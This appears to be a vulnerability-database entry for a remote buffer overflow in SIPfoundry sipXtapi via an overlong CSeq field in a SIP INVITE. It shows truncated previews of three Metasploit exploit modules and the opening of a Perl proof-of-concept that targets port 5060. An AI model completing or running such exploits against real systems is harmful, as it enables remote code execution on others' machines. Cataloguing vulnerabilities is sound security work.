Buffer overflow in SIPfoundry sipXtapi released prior to 20060324 allows remote malicious users to execute arbitrary code via a long CSeq field value in an INVITE message.
##
# $Id: sipxezphone_cseqrb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions Please see the Metasploit
# Framework web site for more information on licensing and terms of use
# metasploitcom/framework/
##
require 'msf/core'
class ...
##
# $Id: aim_triton_cseqrb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions Please see the Metasploit
# Framework web site for more information on licensing and terms of use
# metasploitcom/framework/
##
require 'msf/core'
class ...
#!/usr/bin/perl
# PoC Exploit By mthumann@ernwde
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipxpl <host>\n";
exit;}
$target=$ARGV[0];
my $source ="127001";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41 ...
##
# $Id: sipxphone_cseqrb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions Please see the Metasploit
# Framework web site for more information on licensing and terms of use
# metasploitcom/framework/
##
require 'msf/core'
class M ...
Vulmon